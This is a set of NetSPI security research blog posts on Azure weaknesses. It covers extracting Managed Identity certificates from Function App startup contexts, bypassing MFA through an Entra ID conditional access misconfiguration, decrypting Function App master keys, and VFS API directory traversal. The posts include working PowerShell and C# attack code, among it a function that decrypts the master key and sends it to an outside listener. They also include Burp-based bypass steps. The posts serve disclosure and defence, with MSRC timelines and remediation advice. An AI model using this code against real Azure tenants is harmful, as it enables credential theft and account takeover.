If you’re currently using Azure Container Registries, make sure you review the permissions assigned to the ACRs, along with any permissions assigned to attached Managed Identities. It would also be worthwhile to review permissions on any tasks that you have stored in GitHub, as those could be vulnerable to poisoning attacks. Finally, defenders should look at existing task files to see if there are any malicious tasks, and make sure that you monitor the actions that we noted above. 

Mistaken Identity: Extracting Managed Identity Credentials from Azure Function Apps

As we were preparing our slides and tools for our DEF CON Cloud Village Talk (What the Function: A Deep Dive into Azure Function App Security), Thomas Elling and I stumbled onto an extension of some existing research that we disclosed on the NetSPI blog in March of 2023. We had started working on a function that could be added to a Linux container-based Function App to decrypt the container startup context that is passed to the container on startup. As we got further into building the function, we found that the decrypted startup context disclosed more information than we had previously realized. 

TL;DR 

  1. The Linux containers in Azure Function Apps utilize an encrypted start up context file hosted in Azure Storage Accounts
  2. The Storage Account URL and the decryption key are stored in the container environmental variables and are available to anyone with the ability to execute commands in the container
  3. This startup context can be decrypted to expose sensitive data about the Function App, including the certificates for any attached Managed Identities, allowing an attacker to gain persistence as the Managed Identity. As of November 11, 2023, this issue has been fully addressed by Microsoft.

In the earlier blog post, we utilized an undocumented Azure Management API (as the Azure RBAC Reader role) to complete a directory traversal attack to gain access to the proc file system files. This allowed access to the environmental variables (/proc/self/environ) used by the container. These environmental variables (CONTAINER_ENCRYPTION_KEY and CONTAINER_START_CONTEXT_SAS_URI) could then be used to decrypt the startup context of the container, which included the Function App keys. These keys could then be used to overwrite the existing Function App Functions and gain code execution in the container. At the time of the previous research, we had not investigated the impact of having a Managed Identity attached to the Function App. 

As part of the DEF CON Cloud Village presentation preparation, we wanted to provide code for an Azure function that would automate the decryption of this startup context in the Linux container. This could be used as a shortcut for getting access to the function keys in cases where someone has gained command execution in a Linux Function App container, or gained Storage Account access to the supporting code hosting file shares.  

Here is the PowerShell sample code that we started with:

using namespace System.Net 

# Input bindings are passed in via param block. 
param($Request, $TriggerMetadata) 

$encryptedContext = (Invoke-RestMethod $env:CONTAINER_START_CONTEXT_SAS_URI).encryptedContext.split(".") 

$key = [System.Convert]::FromBase64String($env:CONTAINER_ENCRYPTION_KEY) 
$iv = [System.Convert]::FromBase64String($encryptedContext[0]) 
$encryptedBytes = [System.Convert]::FromBase64String($encryptedContext[1]) 

$aes = [System.Security.Cryptography.AesManaged]::new() 
$aes.Mode = [System.Security.Cryptography.CipherMode]::CBC 
$aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7 
$aes.Key = $key 
$aes.IV = $iv 

$decryptor = $aes.CreateDecryptor() 
$plainBytes = $decryptor.TransformFinalBlock($encryptedBytes, 0, $encryptedBytes.Length) 
$plainText = [System.Text.Encoding]::UTF8.GetString($plainBytes) 

$body =  $plainText 

# Associate values to output bindings by calling 'Push-OutputBinding'. 
Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{ 
    StatusCode = [HttpStatusCode]::OK 
    Body = $body 
})

At a high level, this PowerShell code takes in the environmental variable for the SAS-tokened URL and gathers the encrypted context into a variable. We then set the decryption key from the corresponding environmental variable and the IV from the first section of the encrypted context, and then we complete the AES decryption, outputting the fully decrypted context to the HTTP response.

When building this code, we used an existing Function App in our subscription that had a Managed Identity attached to it. Upon inspection of the decrypted startup context, we noticed a previously unnoticed "MSISpecializationPayload" section of the configuration that contained a list of Identities attached to the Function App.

"MSISpecializationPayload": { 
    "SiteName": "notarealfunctionapp", 
    "MSISecret": "57[REDACTED]F9", 
    "Identities": [ 
      { 
        "Type": "SystemAssigned", 
        "ClientId": " b1abdc5c-3e68-476a-9191-428c1300c50c", 
        "TenantId": "[REDACTED]", 
        "Thumbprint": "BC5C431024BC7F52C8E9F43A7387D6021056630A", 
        "SecretUrl": "https://control-centralus.identity.azure.net/subscriptions/[REDACTED]/", 
        "ResourceId": "", 
        "Certificate": "MIIK[REDACTED]H0A==", 
        "PrincipalId": "[REDACTED]", 
        "AuthenticationEndpoint": null 
      }, 
      { 
        "Type": "UserAssigned", 
        "ClientId": "[REDACTED]", 
        "TenantId": "[REDACTED]", 
        "Thumbprint": "B8E752972790B0E6533EFE49382FF5E8412DAD31", 
        "SecretUrl": "https://control-centralus.identity.azure.net/subscriptions/[REDACTED]", 
        "ResourceId": "/subscriptions/[REDACTED]/Microsoft.ManagedIdentity/userAssignedIdentities/[REDACTED]", 
        "Certificate": "MIIK[REDACTED]0A==", 
        "PrincipalId": "[REDACTED]", 
        "AuthenticationEndpoint": null 
      } 
    ], 
[Truncated]

In each identity listed (SystemAssigned and UserAssigned), there was a “Certificate” section that contained Base64 encoded data, that looked like a private certificate (starts with “MII…”). Next, we decoded the Base64 data and wrote it to a file. Since we assumed that this was a PFX file, we used that as the file extension.  

$b64 = " MIIK[REDACTED]H0A==" 

[IO.File]::WriteAllBytes("C:\temp\micert.pfx", [Convert]::FromBase64String($b64))

We then opened the certificate file in Windows to see that it was a valid PFX file, that did not have an attached password, and we then imported it into our local certificate store. Investigating the certificate information in our certificate store, we noted that the “Issued to:” GUID matched the Managed Identity’s Service Principal ID (b1abdc5c-3e68-476a-9191-428c1300c50c). 
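
The import can also be done from PowerShell. Since the PFX has no password, no credential parameter is needed (this uses the built-in PKI module on Windows):

PS C:\> Import-PfxCertificate -FilePath C:\temp\micert.pfx -CertStoreLocation Cert:\CurrentUser\My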

After installing the certificate, we were then able to use the certificate to authenticate to the Az PowerShell module as the Managed Identity.

PS C:\> Connect-AzAccount -ServicePrincipal -Tenant [REDACTED] -CertificateThumbprint BC5C431024BC7F52C8E9F43A7387D6021056630A -ApplicationId b1abdc5c-3e68-476a-9191-428c1300c50c

Account				             SubscriptionName    TenantId       Environment
-------      				     ----------------    ---------      -----------
b1abdc5c-3e68-476a-9191-428c1300c50c         Research 	         [REDACTED]	AzureCloud

For anyone who has worked with Managed Identities in Azure, you’ll immediately know that this fundamentally breaks the intended usage of a Managed Identity on an Azure resource. Managed Identity credentials are never supposed to be accessed by users in Azure, and the Service Principal App Registration (where you would validate the existence of these credentials) for the Managed Identity isn’t visible in the Azure Portal. The intent of Managed Identities is to grant temporary token-based access to the identity, only from the resource that has the identity attached.

While the Portal UI restricts visibility into the Service Principal App Registration, the details are available via the Get-AzADServicePrincipal Az PowerShell function. The exported certificate files have a 6-month (180 day) expiration date, but the actual credential storage mechanism in Azure AD (now Entra ID) has a 3-month (90 day) rolling rotation for the Managed Identity certificates. On the plus side, certificates are not deleted from the App Registration after the replacement certificate has been created. Based on our observations, it appears that you can make use of the full 3-month life of the certificate, with one month overlapping the new certificate that is issued.
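
For example, the certificate credentials and their validity windows can be reviewed with a couple of Az PowerShell calls (using the Client ID from the earlier output; the property names assume the current Graph-based Az module):

# Look up the Managed Identity's service principal, then list its key credentials
$sp = Get-AzADServicePrincipal -ApplicationId b1abdc5c-3e68-476a-9191-428c1300c50c
Get-AzADSpCredential -ObjectId $sp.Id | Select-Object KeyId, StartDateTime, EndDateTime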

It should be noted that while this proof of concept shows exploitation through Contributor level access to the Function App, any attacker that gained command execution on the Function App container would have been able to execute this attack and gain access to the attached Managed Identity credentials and Function App keys. There are a number of ways that an attacker could get command execution in the container, which we’ve highlighted a few options in the talk that originated this line of research.

Conclusion / MSRC Response

At this point in the research, we quickly put together a report and filed it with MSRC. Here’s what the process looked like:

  • 7/12/23 – Initial discovery of the issue and filing of the report with MSRC
  • 7/13/23 – MSRC opens Case 80917 to manage the issue
  • 8/02/23 – NetSPI requests update on status of the issue
  • 8/03/23 – Microsoft closes the case and issues the following response:
Hi Karl,
 
Thank you for your patience.
 
MSRC has investigated this issue and concluded that this does not pose an immediate threat that requires urgent attention. This is because, for an attacker or user who already has publish access, this issue did not provide any additional access than what is already available. However, the teams agree that access to relevant filesystems and other information needs to be limited.
 
The teams are working on the fix for this issue per their timelines and will take appropriate action as needed to help keep customers protected.
 
As such, this case is being closed.
 
Thank you, we absolutely appreciate your flagging this issue to us, and we look forward to more submissions from you in the future!
  • 8/03/23 – NetSPI replies, restating the issue and attempting to clarify MSRC’s understanding of the issue
  • 8/04/23 – MSRC Reopens the case, partly thanks to a thread of tweets
  • 9/11/23 – Follow up email with MSRC confirms the fix is in progress
  • 11/16/23 – NetSPI discloses the issue publicly

Microsoft’s solution for this issue was to encrypt the “MSISpecializationPayload” and rename it to “EncryptedTokenServiceSpecializationPayload”. It’s unclear how this is getting encrypted, but we were able to confirm that the key that encrypts the credentials does not exist in the container that runs the user code.

It should be noted that the decryption technique for the “CONTAINER_START_CONTEXT_SAS_URI” still works to expose the Function App keys. So, if you do manage to get code execution in a Function App container, you can still potentially use this technique to persist on the Function App with this method.


Prior Research Note:
While doing our due diligence for this blog, we tried to find any prior research on this topic. It appears that Trend Micro also found this issue and disclosed it in June of 2022.

Abusing Entra ID Misconfigurations to Bypass MFA

On a recent external assessment, I stumbled upon a method to bypass a client's MFA requirement: access a single sign-on (SSO) token and leverage that token to access internal applications that—by policy—should have been locked behind an MFA prompt, all without triggering an MFA alert on the end-user's mobile device. This was possible due to a misconfiguration in the client's Entra ID Conditional Access Policy for third-party MFA and a first-party integration with the myaccount.microsoft.com portal.

To understand the vulnerability, there are a few things to know about the Entra ID authentication flow. Within any Entra ID environment, there are numerous cloud applications that are leveraged when a user authenticates. The application with the misconfiguration is "My Profile", which utilizes "My Account", "My Apps", and "My Signins" for additional functionality within the "My Profile" portal. These separate applications are unique and can be individually configured with conditional access policies.

For this vulnerability to be present, four specific requirements must first be met: 

  1. The attacker must have valid credentials to sign into the Entra ID domain. These credentials can be brute forced through password sprays, found in online dumps, or obtained through social engineering.
  2. Entra ID must be configured to use Duo authenticator (or potentially other third-party MFA provider solutions) as the only method for MFA per the instructions on the Duo website.
  3. The “Require Duo MFA” conditional access policy must be configured for “Select Cloud Apps” rather than “All Cloud Apps” (See Image 1 Below). 
  4. The cloud application “My Profile” must not be included in the conditional access policy while other applications utilized by the “My Profile” application — like “My Account” or “My Sign-Ins” — are included.
Image 1: Require Duo MFA Conditional access policy in a vulnerable state.
Source: https://duo.com/docs/azure-ca

When these four conditions are present in an Entra ID Environment, the myaccount.microsoft.com page loads fully into the browser and provides an SSO token to the user before the conditional access policy is executed and a redirect to the Duo authenticator domain occurs to enforce the MFA authentication.

This odd load-time behavior is what alerted me to the potential for an MFA bypass. See the video below to observe how, briefly, the myaccount.microsoft.com page loads fully into the browser window before the redirect to the MFA prompt domain occurs.

Vulnerable sign-in behavior when the four requirements above are met: note the short timeframe when the page fully loads before the authenticator redirect occurs.

In order to test whether this strange behavior was due to the myaccount.microsoft.com page not respecting the conditional access policy, or to a misconfiguration in the policy itself, we changed one variable in the testing environment: setting Assignments to "All Cloud Apps" rather than the vulnerable "Select Cloud Apps." The results of that test can be seen below and show that, with this configuration, the page is not loaded into the browser prior to the MFA prompt.

Expected secure sign-in behavior when three of the four requirements above are met. In this case, the conditional access policy was configured to fire on “All Cloud Apps” rather than “Select Cloud Apps”: note the myaccount.microsoft.com page does not appear before the redirect to Duo.

The exploit to bypass the misconfiguration is trivial. Using Burp Suite, or HTTP(S) proxying software of your choosing, proxy the traffic while authenticating to the myaccount.microsoft.com portal and manually forward packets until enough content has loaded for you to select a new element on the page and add it to the navigation flow. If the packets are manually forwarded and a new element is selected before the authorization redirect to the Duo portal is loaded into the page, the attacker is able to navigate through the myaccount.microsoft.com portal to access internal applications and manipulate user account details, such as password and MFA devices, prior to authorization with MFA.

Authenticating to the myaccount.microsoft.com portal while proxying through Burp Suite and pausing the flow before the MFA Authentication redirect occurs.
Authenticating to the myaccount.microsoft.com portal while proxying through Burp Suite and demonstrating the ability to access the “update security info” page to manually edit security information for the account.

Limitations:

While this misconfiguration can lead to compromise of internal resources, there are some limitations to what it can accomplish that are all based on client configurations within the conditional access policies.

Since cloud-native Microsoft 365 applications are typically configured as part of the conditional access policy that requires MFA, this attack is not useful for accessing M365 resources such as Word Online, Teams, Outlook, or other Microsoft applications through the My Apps portal. Likewise, any other cloud applications that are configured to require multi-factor authentication will still be protected even when being accessed through the My Apps portal. There is also not a known method to elevate this basic token to a more robust token to access portals such as portal.office.com or entra.microsoft.com.

During testing and work with the Microsoft Security Response Center, we examined four different Microsoft Entra ID environments. Of these four environments, only two contained the application "My Profile". I compared licensing, where possible, and found no correlation between licensing and the existence of the "My Profile" application within a tenant.

I attempted to bypass this limitation in environments that did not contain the application by adding the application ID to the conditional access policy using the Entra ID PowerShell modules. This was unsuccessful in the environments that didn't list the application, as those environments do not appear to recognize the application by ID or name.

Microsoft has been made aware of this odd behavior within Entra tenants and is working on a solution to address the lack of a "My Profile" application in some tenants.

Effectiveness of the attack: 

Many organizations must balance user experience and convenience with security measures. When implementing a multi-factor authentication policy, many users do not want to approve multiple notifications just to access a single application. As a result, many organizations protect only the initial sign-in, or externally facing applications accessed from untrusted networks, with MFA, and leave applications that are only reachable from trusted zones unprotected by MFA.

In this example, and in real-world tests, bypassing the MFA prompt on myaccount.microsoft.com allowed the attacker to pause web application pages from loading and navigate from the untrusted myaccount.microsoft.com portal into the trusted zone of myapps.microsoft.com, accessing business data on internal applications without ever providing an MFA token.

The business logic behind the decision to not enforce MFA on these internal applications is valid in principle: the initial MFA prompt should have been completed before the myapps.microsoft.com portal could be reached. This vulnerability, however, takes advantage of a slight timing delay that gives the attacker a valid SSO token before authenticating with Duo, bypassing the business logic in place to prevent access to internal applications without MFA.

Additionally, finding a multi-factor authentication provider that functions well with every vendor and application a business relies on is nearly impossible. As MFA continues to become a standard business process across domains, providers offer varying levels of support for the numerous cloud applications within a business environment. These gaps provide ample targets for attackers looking to leverage this vulnerability against Entra ID subscribers who apply MFA requirements only to specific applications through conditional access policies, whether due to business requirements or lack of support from the specific MFA vendor.

Remediation:

In environments that do include the "My Profile" enterprise application, the tenant administrator must configure a conditional access policy that targets the "My Profile" application to ensure the MFA prompt is triggered at the correct time when a user navigates to the myaccount.microsoft.com portal.

In environments that do not include "My Profile," the only method to enforce MFA on myaccount.microsoft.com is to enforce MFA on "All Cloud Applications." Because the "My Profile" application does not appear in every environment, the misconfiguration stems from administrators believing all first-party Microsoft applications are covered by the conditional access policy. 
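For tenants that do expose the application, a minimal sketch of that remediation using the Microsoft Graph PowerShell SDK is shown below. The display-name lookup and the use of Entra's built-in MFA grant control are assumptions for illustration; in a Duo deployment, you would instead add the application to the existing Duo conditional access policy.

Connect-MgGraph -Scopes 'Policy.ReadWrite.ConditionalAccess','Application.Read.All'

# Resolve the first-party "My Profile" application in this tenant (if present)
$myProfile = Get-MgServicePrincipal -Filter "displayName eq 'My Profile'"

# Conditional access policy requiring MFA for the "My Profile" application
$policy = @{
    displayName   = 'Require MFA - My Profile'
    state         = 'enabled'
    conditions    = @{
        applications = @{ includeApplications = @($myProfile.AppId) }
        users        = @{ includeUsers = @('All') }
    }
    grantControls = @{
        operator        = 'OR'
        builtInControls = @('mfa')
    }
}
New-MgIdentityConditionalAccessPolicy -BodyParameter $policy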

Conclusion: 

Although basic in its implementation and execution, finding this vulnerability was a stark reminder that even where complex security systems are in use across an enterprise, a simple misconfiguration can lead to compromise of secure data with minimal time investment or technical knowledge. As penetration testers, it is easy to get bogged down in the technicalities of complex exploits and the prestige that comes with executing an elaborate exploit chain. Simple misconfigurations with simple exploits can cause just as much damage to an environment, so it is always worth checking the basics.

Find more stories like these in our Azure Pentesting eBook.

Azure Cloud Penetration Testing Stories

The post Abusing Entra ID Misconfigurations to Bypass MFA appeared first on NetSPI.

]]>
What the Function: Decrypting Azure Function App Keys  https://www.netspi.com/blog/technical/cloud-penetration-testing/what-the-function-decrypting-azure-function-app-keys/ Sat, 12 Aug 2023 18:30:00 +0000 https://www.netspi.com/?p=30784 When deploying an Azure Function App, access to supporting Storage Accounts can lead to disclosure of source code, command execution in the app, and decryption of the app’s Access Keys.

The post What the Function: Decrypting Azure Function App Keys  appeared first on NetSPI.

]]>
When deploying an Azure Function App, you’re typically prompted to select a Storage Account to use in support of the application. Access to these supporting Storage Accounts can lead to disclosure of Function App source code, command execution in the Function App, and (as we’ll show in this blog) decryption of the Function App Access Keys.

Azure Function Apps use Access Keys to secure access to HTTP Trigger functions. There are three types of access keys that can be used: function, system, and master (HTTP function endpoints can also be accessed anonymously). The most privileged access key available is the master key, which grants administrative access to the Function App including being able to read and write function source code.  

The master key should be protected and should not be used for regular activities. Gaining access to the master key could lead to supply chain attacks and control of any managed identities assigned to the Function. This blog explores how an attacker can decrypt these access keys if they gain access via the Function App’s corresponding Storage Account. 

TL;DR 

  • Function App Access Keys can be stored in Storage Account containers in an encrypted format 
  • Access Keys can be decrypted within the Function App container AND offline 
  • Works with Windows or Linux, with any runtime stack 
  • Decryption requires access to the decryption key (stored in an environment variable in the Function container) and the encrypted key material (from host.json). 

Previous Research 

Extensive research has already been done on attacking Functions, both directly and via the corresponding Storage Accounts. This blog will focus specifically on key decryption for Function App takeover. 

Requirements 

Function Apps depend on Storage Accounts at multiple product tiers for code and secret storage. 

Required Permissions 

  • Permission to read Storage Account Container blobs, specifically the host.json file (located in Storage Account Containers named “azure-webjobs-secrets”) 
  • Permission to write to Azure File Shares hosting Function code
Screenshot of Storage Accounts associated with a Function App

The host.json file contains the encrypted access keys. The encrypted master key is contained in the masterKey.value field.

{ 
  "masterKey": { 
    "name": "master", 
    "value": "CfDJ8AAAAAAAAAAAAAAAAAAAAA[TRUNCATED]IA", 
    "encrypted": true 
  }, 
  "functionKeys": [ 
    { 
      "name": "default", 
      "value": "CfDJ8AAAAAAAAAAAAAAAAAAAAA[TRUNCATED]8Q", 
      "encrypted": true 
    } 
  ], 
  "systemKeys": [],
  "hostName": "thisisafakefunctionappprobably.azurewebsites.net",
  "instanceId": "dc[TRUNCATED]c3",
  "source": "runtime",
  "decryptionKeyId": "MACHINEKEY_DecryptionKey=op+[TRUNCATED]Z0=;"
}

The code for the corresponding Function App is stored in Azure File Shares. For what it's worth, with access to the host.json file, an attacker can technically overwrite existing keys and set the "encrypted" parameter to false to inject their own cleartext function keys into the Function App (see Rogier Dijkman's research). A Windows ASP.NET Function App (thisisnotrealprobably) typically uses the following directory structure: 
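A representative layout for a default Windows Function App file share, reconstructed here for illustration (the function and file names are placeholders):

site
└── wwwroot
    ├── host.json
    └── HttpTrigger1
        ├── function.json
        └── run.csx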

A new function can be created by adding a new set of folders under the wwwroot folder in the SMB file share. 

The ability to create a new function trigger by creating folders in the File Share is necessary to either decrypt the key in the function runtime OR return the decryption key by retrieving a specific environment variable. 

Decryption in the Function container 

Function App Key Decryption is dependent on ASP.NET Core Data Protection. There are multiple references to a specific library for Function Key security in the Function Host code.  

An old version of this library can be found at https://github.com/Azure/azure-websites-security. This library creates a Function specific Azure Data Protector for decryption. The code below has been modified from an old MSDN post to integrate the library directly into a .NET HTTP trigger. Providing the encrypted master key to the function decrypts the key upon triggering. 

The sample code below can be modified to decrypt the key and then send the key to a publicly available listener. 

#r "Newtonsoft.Json" 

using Microsoft.AspNetCore.DataProtection; 
using Microsoft.Azure.Web.DataProtection; 
using System.Net.Http; 
using System.Text; 
using System.Net; 
using Microsoft.AspNetCore.Mvc; 
using Microsoft.Extensions.Primitives; 
using Newtonsoft.Json; 

private static HttpClient httpClient = new HttpClient(); 

public static async Task<IActionResult> Run(HttpRequest req, ILogger log) 
{ 
    log.LogInformation("C# HTTP trigger function processed a request."); 

    DataProtectionKeyValueConverter converter = new DataProtectionKeyValueConverter(); 
    string keyname = "master"; 
    string encval = "Cf[TRUNCATED]NQ"; 
    var ikey = new Key(keyname, encval, true); 

    if (ikey.IsEncrypted) 
    { 
        ikey = converter.ReadValue(ikey); 
    } 
    // log.LogInformation(ikey.Value); 
    string url = "https://[TRUNCATED]"; 
    string body = $"{{"name":"{keyname}", "value":"{ikey.Value}"}}"; 
    var response = await httpClient.PostAsync(url, new StringContent(body.ToString())); 

    string name = req.Query["name"]; 

    string requestBody = await new StreamReader(req.Body).ReadToEndAsync(); 
    dynamic data = JsonConvert.DeserializeObject(requestBody); 
    name = name ?? data?.name; 

    string responseMessage = string.IsNullOrEmpty(name) 
        ? "This HTTP triggered function executed successfully. Pass a name in the query string or in the request body for a personalized response." 
                : $"Hello, {name}. This HTTP triggered function executed successfully."; 

            return new OkObjectResult(responseMessage); 
} 

class DataProtectionKeyValueConverter 
{ 
    private readonly IDataProtector _dataProtector; 
 
    public DataProtectionKeyValueConverter() 
    { 
        var provider = DataProtectionProvider.CreateAzureDataProtector(); 
        _dataProtector = provider.CreateProtector("function-secrets"); 
    } 

    public Key ReadValue(Key key) 
    { 
        var resultKey = new Key(key.Name, null, false); 
        resultKey.Value = _dataProtector.Unprotect(key.Value); 
        return resultKey; 
    } 
} 

class Key 
{ 
    public Key(){} 

    public Key(string name, string value, bool encrypted) 
    { 
        Name = name; 
        Value = value; 
        IsEncrypted = encrypted; 
    } 

    [JsonProperty(PropertyName = "name")] 
    public string Name { get; set; } 

    [JsonProperty(PropertyName = "value")] 
    public string Value { get; set; } 

    [JsonProperty(PropertyName = "encrypted")] 
    public bool IsEncrypted { get; set; }
}

Triggering via browser: 

Screenshot of triggering via browser saying This HTTP triggered function executed successfully. Pass a name in the query body for a personalized response.

Burp Collaborator:

Screenshot of Burp collaborator.

Master key:

Screenshot of Master key.

Local Decryption 

Decryption can also be done outside of the function container. The https://github.com/Azure/azure-websites-security repo contains an older version of the code that can be pulled down and run locally through Visual Studio. However, there is one requirement for running locally: access to the decryption key.

The code makes multiple references to the location of default keys:

The Constants.cs file leads to two environment variables of note: AzureWebEncryptionKey (default) or MACHINEKEY_DecryptionKey. The decryption code defaults to the AzureWebEncryptionKey environment variable.  

One thing to keep in mind is that the environment variable name differs depending on the underlying Function operating system: Linux-based containers use AzureWebEncryptionKey, while Windows uses MACHINEKEY_DecryptionKey. One of these environment variables will be available via Function App trigger code, regardless of the runtime used. The environment variable values can be returned in the Function using native code. The example below is for PowerShell in a Windows environment: 

$env:MACHINEKEY_DecryptionKey

This can then be returned to the user via an HTTP Trigger response or by having the Function send the value to another endpoint. 
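As a minimal sketch, the default PowerShell HTTP trigger can be trimmed down to return whichever decryption-key variable is present in the container:

using namespace System.Net

# Input bindings are passed in via param block.
param($Request, $TriggerMetadata)

# Return whichever decryption-key variable exists in this container
$key = $env:MACHINEKEY_DecryptionKey                   # Windows containers
if (-not $key) { $key = $env:AzureWebEncryptionKey }   # Linux containers

Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{
    StatusCode = [HttpStatusCode]::OK
    Body       = $key
})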

The local decryption can be done once the encrypted key data and the decryption key are obtained. After pulling down the GitHub repo and getting it set up in Visual Studio, quick decryption can be done directly through an existing test case in DataProtectionProviderTests.cs with the following edits:

// Copyright (c) .NET Foundation. All rights reserved. 
// Licensed under the MIT License. See License.txt in the project root for license information. 

using System; 
using Microsoft.Azure.Web.DataProtection; 
using Microsoft.AspNetCore.DataProtection; 
using Xunit; 
using System.Diagnostics; 
using System.IO; 

namespace Microsoft.Azure.Web.DataProtection.Tests 
{ 
    public class DataProtectionProviderTests 
    { 
        [Fact] 
        public void EncryptedValue_CanBeDecrypted()  
        { 
            using (var variables = new TestScopedEnvironmentVariable(Constants.AzureWebsiteLocalEncryptionKey, "CE[TRUNCATED]1B")) 
            { 
                var provider = DataProtectionProvider.CreateAzureDataProtector(null, true); 

                var protector = provider.CreateProtector("function-secrets"); 

                string expected = "test string"; 

                // string encrypted = protector.Protect(expected); 
                string encrypted = "Cf[TRUNCATED]8w"; 

                string result = protector.Unprotect(encrypted); 

                File.WriteAllText("test.txt", result); 
                Assert.Equal(expected, result); 
            } 
        } 
    } 
} 

Run the test case after replacing the variable values with the two required items. The test will fail, but the decrypted master key will be returned in test.txt! This can then be used to query the Function App administrative REST APIs. 

Tool Overview 

NetSPI created a proof-of-concept tool to exploit Function Apps through the connected Storage Account. The tool requires write access to the corresponding File Share where the Function code is stored, and it supports .NET, PSCore, Python, and Node. Given a Storage Account that is connected to a Function App, the tool will attempt to create an HTTP Trigger (a function-specific API key is required for access) to return the decryption key and scoped Managed Identity access tokens (if applicable). The tool will also attempt to clean up any uploaded code once the key and tokens are received.  

Once the encryption key and encrypted function app key are returned, you can use the Function App code included in the repo to decrypt the master key. To make it easier, we’ve provided an ARM template in the repo that will create the decryption Function App for you.

Screenshot of welcome screen to the NetSPI "FuncoPop" app (Function App Key Decryption).

See the GitHub link https://github.com/NetSPI/FuncoPop for more info. 

Prevention and Mitigation 

There are a number of ways to prevent the attack scenarios outlined in this blog and in previous research. The best prevention strategy is treating the corresponding Storage Accounts as an extension of the Function Apps. This includes: 

  1. Limit the use of Storage Account Shared Access Keys and ensure that they are not stored in cleartext.
  2. Rotate Shared Access Keys. 
  3. Limit the creation of privileged, long-lasting SAS tokens. 
  4. Use the principle of least privilege. Grant only the privileges necessary, at the narrowest scope. Be aware of any roles that grant write access to Storage Accounts (including roles with list-keys permissions!). 
  5. Identify Function Apps that use Storage Accounts and ensure that these resources are placed in dedicated Resource Groups.
  6. Avoid using shared Storage Accounts for multiple Functions. 
  7. Ensure that Diagnostic Settings are in place to collect audit and data plane logs. 

More direct methods of mitigation can also be taken such as storing keys in Key Vaults or restricting Storage Accounts to VNETs. See the links below for Microsoft recommendations. 

MSRC Timeline 

As part of our standard Azure research process, we ran our findings by MSRC before publishing anything. 

02/08/2023 – Initial report created
02/13/2023 – Case closed as expected and documented behavior
03/08/2023 – Second report created
04/25/2023 – MSRC confirms original assessment as expected and documented behavior 
08/12/2023 – DefCon Cloud Village presentation 

Thanks to Nick Landers for his help/research into ASP.NET Core Data Protection. 

The post What the Function: Decrypting Azure Function App Keys  appeared first on NetSPI.

]]>
Escalating Privileges with Azure Function Apps https://www.netspi.com/blog/technical/cloud-penetration-testing/azure-function-apps/ Thu, 23 Mar 2023 13:24:36 +0000 https://www.netspi.com/?p=29749 Explore how undocumented APIs used by the Azure Function Apps Portal menu allowed for directory traversal on the Function App containers.

The post Escalating Privileges with Azure Function Apps appeared first on NetSPI.

]]>
As penetration testers, we continue to see an increase in applications built natively in the cloud. These are a mix of legacy applications that are ported to cloud-native technologies and new applications that are freshly built in the cloud provider. One of the technologies that we see being used to support these development efforts is Azure Function Apps. We recently took a deeper look at some of the Function App functionality that resulted in a privilege escalation scenario for users with Reader role permissions on Function Apps. In the case of functions running in Linux containers, this resulted in command execution in the application containers. 

TL;DR 

Undocumented APIs used by the Azure Function Apps Portal menu allowed for arbitrary file reads on the Function App containers.  

  • For the Windows containers, this resulted in access to ASP.NET encryption keys. 
  • For the Linux containers, this resulted in access to function master keys that allowed for overwriting Function App code and gaining remote code execution in the container. 

What are Azure Function Apps?

As noted above, Function Apps are one of the pieces of technology used for building cloud-native applications in Azure. The service falls under the umbrella of “App Services” and has many of the common features of the parent service. At its core, the Function App service is a lightweight API service that can be used for hosting serverless application services.  

The Azure Portal allows users (with Reader or greater permissions) to view files associated with the Function App, along with the code for the application endpoints (functions). In the Azure Portal, under App files, we can see the files available at the root of the Function App. These are usually requirement files and any supporting files you want to have available for all underlying functions. 

An example of a file available at the root of the Function App within the Azure Portal.

Under the individual functions (HttpTrigger1), we can enter the Code + Test menu to see the source code for the function. Much like the code in an Automation Account Runbook, the function code is available to anyone with Reader permissions. We do frequently find hardcoded credentials in this menu, so this is a common menu for us to work with. 

A screenshot of the source for the function (HttpTrigger1).

Both file viewing options rely on an undocumented API that can be found by proxying your browser traffic while accessing the Azure Portal. The following management.azure.com API endpoint uses the VFS function to list files in the Function App:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc/hostruntime/admin/vfs//?relativePath=1&api-version=2021-01-15 

In the example above, $SUB_ID would be your subscription ID, and this is for the “vfspoc” Function App in the “tester” resource group.


Discovery of the Issue

Using the identified URL, we started enumerating available files in the output:

[
  {
    "name": "host.json",
    "size": 141,
    "mtime": "2022-08-02T19:49:04.6152186+00:00",
    "crtime": "2022-08-02T19:49:04.6092235+00:00",
    "mime": "application/json",
    "href": "https://vfspoc.azurewebsites.net/admin/vfs/host.
json?relativePath=1&api-version=2021-01-15",
    "path": "C:\\home\\site\\wwwroot\\host.json"
  },
  {
    "name": "HttpTrigger1",
    "size": 0,
    "mtime": "2022-08-02T19:51:52.0190425+00:00",
    "crtime": "2022-08-02T19:51:52.0190425+00:00",
    "mime": "inode/directory",
    "href": "https://vfspoc.azurewebsites.net/admin/vfs/Http
Trigger1%2F?relativePath=1&api-version=2021-01-15",
    "path": "C:\\home\\site\\wwwroot\\HttpTrigger1"
  }
]

As we can see above, this is the expected output. We can see the host.json file that is available in the Azure Portal, and the HttpTrigger1 function directory. At first glance, this may seem like nothing. While reviewing some function source code in client environments, we noticed that additional directories were being added to the Function App root directory to add libraries and supporting files for use in the functions. These files are not visible in the Portal if they’re in a directory (See “Secret Directory” below). The Portal menu doesn’t have folder handling built in, so these files seem to be invisible to anyone with the Reader role. 

Function app files menu not showing the secret directory in the file drop down.

By using the VFS APIs, we can view all the files in these application directories, including sensitive files that the Azure Function App Contributors might have assumed were hidden from Readers. While this is a minor information disclosure, we can take the issue further by modifying the “relativePath” parameter in the URL from a “1” to a “0”. 

Changing this parameter allows us to now see the direct file system of the container. In this first case, we’re looking at a Windows Function App container. As a test harness, we’ll use a little PowerShell to grab a “management.azure.com” token from our authenticated (as a Reader) Azure PowerShell module session, and feed that to the API for our requests to read the files from the vfspoc Function App. 

$mgmtToken = (Get-AzAccessToken -ResourceUrl 
"https://management.azure.com").Token 

(Invoke-WebRequest -Verbose:$false -Uri (-join ("https://management.
azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/
Microsoft.Web/sites/vfspoc/hostruntime/admin/vfs//?relativePath=
0&api-version=2021-01-15")) -Headers @{Authorization="Bearer 
$mgmtToken"}).Content | ConvertFrom-Json 

name   : data 
size   : 0 
